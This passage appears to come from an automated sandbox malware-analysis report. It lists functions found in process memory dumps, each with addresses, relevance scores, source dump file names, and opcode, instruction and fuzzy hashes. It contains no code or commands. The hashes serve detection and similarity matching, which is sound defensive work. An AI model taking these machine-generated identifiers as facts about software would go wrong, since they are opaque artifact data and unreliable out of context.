                                                                                  • Opcode ID: 6a91166e0df2e2f88ea5f83d6b71ef547d6dd9202385baa3d0f5d53ebdcc08b0
                                                                                  • Instruction ID: 8b670859e8f39be72772a90279ad76a6495496fc004d00f08c10a37b1182c5c3
                                                                                  • Opcode Fuzzy Hash: 6a91166e0df2e2f88ea5f83d6b71ef547d6dd9202385baa3d0f5d53ebdcc08b0
                                                                                  • Instruction Fuzzy Hash: 3F118B7090526ADFCB648F60CC08BEDBBB0BF05304F1482E9859CAB290DB311A8ADF10
                                                                                  Function 00C0885A Relevance: 1.3, Strings: 1, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: "
                                                                                  • API String ID: 0-123907689
                                                                                  • Opcode ID: 571934044217dedaf6c99663e3485b79b1551a8dfa2ca7b03515272186c9ba40
                                                                                  • Instruction ID: e3cd60ba273dbea5f8c578493fd9091c35cb578fb1613d0be03e24445fd5e72a
                                                                                  • Opcode Fuzzy Hash: 571934044217dedaf6c99663e3485b79b1551a8dfa2ca7b03515272186c9ba40
                                                                                  • Instruction Fuzzy Hash: 1001D074E012299FDB65DF60D964BDDBBB1BF08300F1091A9E609A7284DB701E85DF04
                                                                                  Function 00C08F39 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,
                                                                                  • API String ID: 0-3772416878
                                                                                  • Opcode ID: 8e780b6022b6e2e6acbc07a46528a31e10ac6aa2460312472b42d7eff1e11df5
                                                                                  • Instruction ID: 76e947c5a2093cf5ad9437d02b6d606883753b03bf8a52980737a6378e042857
                                                                                  • Opcode Fuzzy Hash: 8e780b6022b6e2e6acbc07a46528a31e10ac6aa2460312472b42d7eff1e11df5
                                                                                  • Instruction Fuzzy Hash: 1CF01C74909258DFD750CF54C994BA9BBF4FF09304F18C0EAC849A7252DB309A4ACF00
                                                                                  Function 070E1330 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2191082568.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70e0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: e
                                                                                  • API String ID: 0-4024072794
                                                                                  • Opcode ID: 57abbdaa24ce698dfa8545f79479f8ca358893ed6b27b0cc7698f56494cb29cb
                                                                                  • Instruction ID: 9d325c198dd87e14cb57c4fea35d54b84758d553ae56b2857412afa8b1fe89cb
                                                                                  • Opcode Fuzzy Hash: 57abbdaa24ce698dfa8545f79479f8ca358893ed6b27b0cc7698f56494cb29cb
                                                                                  • Instruction Fuzzy Hash: 16F03470A0021ACFCB68CF14CC58BADB7B5AB4A301F1181E99A19AB345D7345E84CF41
                                                                                  Function 00C086BA Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: B
                                                                                  • API String ID: 0-1255198513
                                                                                  • Opcode ID: 58749320dfd466f555d7ba26db40cff7eb5b71bfc4d9dced9dd9dccdf4ddae48
                                                                                  • Instruction ID: 26de4cbed993e483cad7e4e63c7fc30bbc2cf99c32fec7f881b6c2c003545222
                                                                                  • Opcode Fuzzy Hash: 58749320dfd466f555d7ba26db40cff7eb5b71bfc4d9dced9dd9dccdf4ddae48
                                                                                  • Instruction Fuzzy Hash: BCF0393190060ADBCF119F50CC10ADEB732FF59300F10C686EA6A37250DB30AA96DF80
                                                                                  Function 00C089A8 Relevance: 1.3, Strings: 1, Instructions: 17COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: %
                                                                                  • API String ID: 0-2567322570
                                                                                  • Opcode ID: 1eb9547ab813e09c1432f5e21fd308deda0acadd372e56cdfea32e153e0e1b78
                                                                                  • Instruction ID: 7f06b97d2aa08d33855fd43df441e0ae707c78993cf6728ac012a85cc64676dd
                                                                                  • Opcode Fuzzy Hash: 1eb9547ab813e09c1432f5e21fd308deda0acadd372e56cdfea32e153e0e1b78
                                                                                  • Instruction Fuzzy Hash: 7DE04630A09229CBCF249F25C808BAAB6B0BB45310F20C0DAD86D63285DA304A8ADF05
                                                                                  Function 00C08A29 Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #
                                                                                  • API String ID: 0-1885708031
                                                                                  • Opcode ID: 055488a787a3795181827650cd7a1a331372ac84c8a2c9f9c00d6dcf4ba2fb43
                                                                                  • Instruction ID: ea2e57c0e703ff284b54631a873a7ddba3e7bbc4ab57164e51adc2519cc0ec43
                                                                                  • Opcode Fuzzy Hash: 055488a787a3795181827650cd7a1a331372ac84c8a2c9f9c00d6dcf4ba2fb43
                                                                                  • Instruction Fuzzy Hash: 49E0EC39904229CFEB14CF10D848BDDBBB1FB04305F1091E5C40963254D7355B85DF00
                                                                                  Function 00AD451C Relevance: 1.3, Strings: 1, Instructions: 7COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: jjjjjj
                                                                                  • API String ID: 0-3900813449
                                                                                  • Opcode ID: 10f1b1f2e681f4c3f0946ee5b2acc2b82e51606178fc27fde725dc70b4da28d5
                                                                                  • Instruction ID: 036c0b3fa53745d1ba5f0d3cf15b2abead68884f98a836f9214fa2052ab5ee78
                                                                                  • Opcode Fuzzy Hash: 10f1b1f2e681f4c3f0946ee5b2acc2b82e51606178fc27fde725dc70b4da28d5
                                                                                  • Instruction Fuzzy Hash: DDC0923240E384CFCB1B4E1488D52607FA0BE62204329C0EAC4874F21BC1288A8AE722
                                                                                  Function 00AD2A78 Relevance: .5, Instructions: 535COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8fc48a7bb8bed3cc7fe5338c23d77640b29e32965a5c6dabf284ef34172a6f92
                                                                                  • Instruction ID: dda1ed61c8978c7db9bfacd0f6dea60b072099a8505780fee53fc6f28f01fbca
                                                                                  • Opcode Fuzzy Hash: 8fc48a7bb8bed3cc7fe5338c23d77640b29e32965a5c6dabf284ef34172a6f92
                                                                                  • Instruction Fuzzy Hash: 164236B1A04200CFD722EF16D648A68BFB1FB50315F96D0AAD0164F26AD77AED85CF41
                                                                                  Function 00AD29A0 Relevance: .5, Instructions: 484COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2e5e7bd6dcf6b1f48d1e667129a650d45b5e02d0d5c35e0ed340aab673e46f9a
                                                                                  • Instruction ID: 7f164ac5fdb697464d70f24bd24a5504d4a189743cc8d19e03ac90d4521c46b5
                                                                                  • Opcode Fuzzy Hash: 2e5e7bd6dcf6b1f48d1e667129a650d45b5e02d0d5c35e0ed340aab673e46f9a
                                                                                  • Instruction Fuzzy Hash: 713239B1A04300CFE722EF16D648A697FF1FB11315F86D0AAD0164F66AD77AD989CB01
                                                                                  Function 00AD3600 Relevance: .5, Instructions: 469COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e2b5f28bb165db69cf47ac6a608a9b31952aba09df44ed565b09a20fa23fe95
                                                                                  • Instruction ID: 28d3b1a8053809fd1e0487f3727d096c0c248da70dc4c52fd8fc97cd8557a18c
                                                                                  • Opcode Fuzzy Hash: 4e2b5f28bb165db69cf47ac6a608a9b31952aba09df44ed565b09a20fa23fe95
                                                                                  • Instruction Fuzzy Hash: E2027D72A046499FDF11CF68C894AAEBBF1EF45300F24856BE447AB352D730EA45CB52
                                                                                  Function 00AD2A70 Relevance: .4, Instructions: 396COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 958474563b93aebd1b63c892c4864703ae21b6e431fccecd37e53052a0cf3659
                                                                                  • Instruction ID: 7e98282789f2779a3ff8a44735a5427824d7768da4025534945c222300173cc0
                                                                                  • Opcode Fuzzy Hash: 958474563b93aebd1b63c892c4864703ae21b6e431fccecd37e53052a0cf3659
                                                                                  • Instruction Fuzzy Hash: 5F12F6B1A05200CFE722EF16D649A687FF1FB11315F86D0AAD0164F26ADB7AD985CF01
                                                                                  Function 00C06220 Relevance: .3, Instructions: 322COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: efc33237945fd094f672a80bf0d9230f54f613940f08578b60e378541e0da86c
                                                                                  • Instruction ID: 572ca9793315fb8b9515fe60d986b09e27467f0d2e844d58dfb5292d2170fb34
                                                                                  • Opcode Fuzzy Hash: efc33237945fd094f672a80bf0d9230f54f613940f08578b60e378541e0da86c
                                                                                  • Instruction Fuzzy Hash: 98E12470E04218CFDB94EFA5D864BADB7B2FB49300F5095AAD51AA7399CB305E84CF01
                                                                                  Function 00C0621D Relevance: .3, Instructions: 312COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cfcc8cb4093b0f7a018c43319a4f1fa2600d11cda90ec89c1db0976d61d3650a
                                                                                  • Instruction ID: be8294e9ee730cf626833ce16dc400af1b4b0a417404f4fa087bd40cc78b3d41
                                                                                  • Opcode Fuzzy Hash: cfcc8cb4093b0f7a018c43319a4f1fa2600d11cda90ec89c1db0976d61d3650a
                                                                                  • Instruction Fuzzy Hash: 8FE11570E00218CFDB94EFA5D964BADB7B2FB49300F5095AAD51AA7399CB305E84CF11
                                                                                  Function 00C065BF Relevance: .3, Instructions: 299COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: adb565a54059b44a6bf9e3a49abee74b44f73870de554443d1b97c0a6e7cf0de
                                                                                  • Instruction ID: 1afd845ec3f4a974b28e06589bbfc24d2abf80845666bf828ac250652c0f1ab0
                                                                                  • Opcode Fuzzy Hash: adb565a54059b44a6bf9e3a49abee74b44f73870de554443d1b97c0a6e7cf0de
                                                                                  • Instruction Fuzzy Hash: 25D11670E04218CFDB94EF64D964BADB7B2FB49300F5095AAD51AAB399DB305E81CF01
                                                                                  Function 00ADF9A0 Relevance: .3, Instructions: 289COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 45b68c134ea1167c0e1b1f0e4f07b55807627aa0954dafc802ec4a4844ff84a5
                                                                                  • Instruction ID: 0aeb35c02a906615a3c5656dade29a18513b3c3576fab724d949e4c2f02f55aa
                                                                                  • Opcode Fuzzy Hash: 45b68c134ea1167c0e1b1f0e4f07b55807627aa0954dafc802ec4a4844ff84a5
                                                                                  • Instruction Fuzzy Hash: 5CB11534700219CFDB14DF69C894A6E7BB6BF89710F2084AAE506CB3A5DB71DD42CB91
                                                                                  Function 00ADFD8C Relevance: .2, Instructions: 245COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 343ce231a7f83c81d6ce1b0a58f3f42e18995c14ecfb348fe10d08f6f75b6908
                                                                                  • Instruction ID: 05262b71b12f802c75e0212ae1750bef85552a0664a9c903a31649fb76157d05
                                                                                  • Opcode Fuzzy Hash: 343ce231a7f83c81d6ce1b0a58f3f42e18995c14ecfb348fe10d08f6f75b6908
                                                                                  • Instruction Fuzzy Hash: 6381BD327042559FDB1ADF68D850AAE7BA2FF85300B14816AE906CF392CB34DD46C7A5
                                                                                  Function 00C070B1 Relevance: .2, Instructions: 245COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 62cbd41290e4e3a733dea84314288c9d5c1d331278ba8ad167d31dc9680c3b56
                                                                                  • Instruction ID: 5aa27aa3267e2bd70ad34aad9b48ac3b67604ec37daed3f2db1e99c242a21163
                                                                                  • Opcode Fuzzy Hash: 62cbd41290e4e3a733dea84314288c9d5c1d331278ba8ad167d31dc9680c3b56
                                                                                  • Instruction Fuzzy Hash: CBB1F470E01218CFDB54DF69D994BADBBB2FB49304F60A1A9D419A7398DB305E85CF01
                                                                                  Function 00C04EC8 Relevance: .2, Instructions: 181COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 31ff669aa93166e65fc6f9df58bce7a49a868142cebae6a617079ceb09c61679
                                                                                  • Instruction ID: bfb19ab3581968f6a57674e76bb446c30e7c1c31f394b5c314b7d23c7fb8f09a
                                                                                  • Opcode Fuzzy Hash: 31ff669aa93166e65fc6f9df58bce7a49a868142cebae6a617079ceb09c61679
                                                                                  • Instruction Fuzzy Hash: 697138B0D04209CFDB48DFAAE9847AEBBF2FB49305F20A12AD519B7294DB345945CF40
                                                                                  Function 00C04EBA Relevance: .2, Instructions: 181COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5ce6f0f1e2a54e657379254aa81d5d9feceb5f2bbc6c2bc3121ab467b6a9d051
                                                                                  • Instruction ID: 41ea08938c1922cc8373e1eb71107c3605862350a327432c99dc9bbe5e8b4805
                                                                                  • Opcode Fuzzy Hash: 5ce6f0f1e2a54e657379254aa81d5d9feceb5f2bbc6c2bc3121ab467b6a9d051
                                                                                  • Instruction Fuzzy Hash: E27149B0D04209CFDB44DFAAE9847AEBBF2FB49305F20A12AD519B7294DB345945CF40
                                                                                  Function 00C05134 Relevance: .2, Instructions: 171COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b2abc0d12a72ed027629b22c537e434e471651ed15d6cc326356580f25fb97c2
                                                                                  • Instruction ID: 1a6d42a1234feac6ca9a0bb7a13285d15515ca58922a2adc285895861e444ca8
                                                                                  • Opcode Fuzzy Hash: b2abc0d12a72ed027629b22c537e434e471651ed15d6cc326356580f25fb97c2
                                                                                  • Instruction Fuzzy Hash: 0A7137B0D05209CFDB54DFA9E984BAEBBF2FB49305F20A12AD519B7298DB345945CF00
                                                                                  Function 00C09603 Relevance: .2, Instructions: 151COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fb56ffd51d2a1cb1208c97e5047e3b91a3755859da97122afa6d040bbe246b7c
                                                                                  • Instruction ID: 105c4b29dd242d751f4a98a5d8eb7d6e743ed65a0bac051558d4e6fe52d996bb
                                                                                  • Opcode Fuzzy Hash: fb56ffd51d2a1cb1208c97e5047e3b91a3755859da97122afa6d040bbe246b7c
                                                                                  • Instruction Fuzzy Hash: 2D517970D05258CFDB20CF99CC54BEEBBB5FB89304F0091AAE509A7292D7365A85CF50
                                                                                  Function 00AD35FA Relevance: .1, Instructions: 144COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d6302ea78c6c9e88224e7f4faa45b661857b7ba5ab54df153cbadfb78a6ec704
                                                                                  • Instruction ID: b3ee6630af6491737d87c1a35663ce46db7443a98be4fe42afc27d58269844cd
                                                                                  • Opcode Fuzzy Hash: d6302ea78c6c9e88224e7f4faa45b661857b7ba5ab54df153cbadfb78a6ec704
                                                                                  • Instruction Fuzzy Hash: 96513072E05109EFDF00DF98D990AAEB7B2FF44350F248126E506AB351E730EE458B96
                                                                                  Function 00C01260 Relevance: .1, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b4fa0e4ab487462939f29f922db1c5e7eff5d993fa3e5098d44ef5d228ff5fad
                                                                                  • Instruction ID: c5964a00fb11563c073f798e0fab9fd853298905e3da5add79984bc681d10d1a
                                                                                  • Opcode Fuzzy Hash: b4fa0e4ab487462939f29f922db1c5e7eff5d993fa3e5098d44ef5d228ff5fad
                                                                                  • Instruction Fuzzy Hash: 1D610070D08228CFDB65DF2AC8587ADB7B2BB49300F1491EAD81DA72A5DB745E81DF40
                                                                                  Function 00C0974D Relevance: .1, Instructions: 133COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9d31768458f3b99a5623f46bd2865aecc7a1e5fe4e30d9466df3b6eaba659de1
                                                                                  • Instruction ID: f87d5988941dc6d427ff211df60d8d0e9a020f538d735d69d621299dff64c816
                                                                                  • Opcode Fuzzy Hash: 9d31768458f3b99a5623f46bd2865aecc7a1e5fe4e30d9466df3b6eaba659de1
                                                                                  • Instruction Fuzzy Hash: B951697090A258CFDB21CF25CC90BD9BBF5FB4A304F1451EAE10AA7292D7355A89DF10
                                                                                  Function 00AD349E Relevance: .1, Instructions: 131COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 11f15b97eb3e9a7d881e89fd8c5df8fe7fd4b87e33f2c67eb3793b0a411011e8
                                                                                  • Instruction ID: 9e0856fa36575c6db81af6d01e5dd00574b01bc3b2ee67f1f0f7a780e571e87e
                                                                                  • Opcode Fuzzy Hash: 11f15b97eb3e9a7d881e89fd8c5df8fe7fd4b87e33f2c67eb3793b0a411011e8
                                                                                  • Instruction Fuzzy Hash: 8A41E573A08246CFCF01CFA4DC906AEBBB1EF45301F2585A7D507AB252E7359A46CB52
                                                                                  Function 00AD3878 Relevance: .1, Instructions: 130COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c67dc0af2d42d63a38fc82177c1b671b22b6dba19257ce67e2fd0d8d356095eb
                                                                                  • Instruction ID: f3257070e2c496bd8df0923897f55bb846f469afe33cc2330767418132f874ec
                                                                                  • Opcode Fuzzy Hash: c67dc0af2d42d63a38fc82177c1b671b22b6dba19257ce67e2fd0d8d356095eb
                                                                                  • Instruction Fuzzy Hash: 4B511976A00609DFCB10CF59C584AAAB7F1FF88350F20856BE94B97320D731EA45DB52
                                                                                  Function 00ADDCCB Relevance: .1, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4f8babbf4696cbbfa294b45afa6107e52fae69d7d66c610c83b683b37ac856bf
                                                                                  • Instruction ID: 9928e1179594d79d3b8b23a61b0fd489bcf1a74a15a340db975d218ace575d7e
                                                                                  • Opcode Fuzzy Hash: 4f8babbf4696cbbfa294b45afa6107e52fae69d7d66c610c83b683b37ac856bf
                                                                                  • Instruction Fuzzy Hash: 6741B470C0A3889FDB01EF68D86469E7FF2EF86300F1481EBD0559B296D7344A89DB61
                                                                                  Function 00AD65D8 Relevance: .1, Instructions: 125COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9d4e237feb2906d35e212446ed27dd79c235c723e349190232a220f5c2ac1ebe
                                                                                  • Instruction ID: a64abd1a0846c7d0b13359873fe9ae8f9e847db9acbed78e79c7d82c68ae17b6
                                                                                  • Opcode Fuzzy Hash: 9d4e237feb2906d35e212446ed27dd79c235c723e349190232a220f5c2ac1ebe
                                                                                  • Instruction Fuzzy Hash: F5315970D052499FDB10CFA9C884BEEBFF5AF48350F24846AE945AB350CB749945CB90
                                                                                  Function 00AD3CEA Relevance: .1, Instructions: 125COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 794e836cf9f6bd7f444e1a4b8a2eabe1f4d5fc4413ce0488f2a2aefd53b5a07e
                                                                                  • Instruction ID: 087e1588d856f3ebf8b39042a67f03a5d661f555bd1cd41a9e20b17992d42c0b
                                                                                  • Opcode Fuzzy Hash: 794e836cf9f6bd7f444e1a4b8a2eabe1f4d5fc4413ce0488f2a2aefd53b5a07e
                                                                                  • Instruction Fuzzy Hash: A9413F32604149DFCF14DF68D881AAABBB2FB45310F204867E9439B351D7319A41DF62
                                                                                  Function 00AD1F38 Relevance: .1, Instructions: 124COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
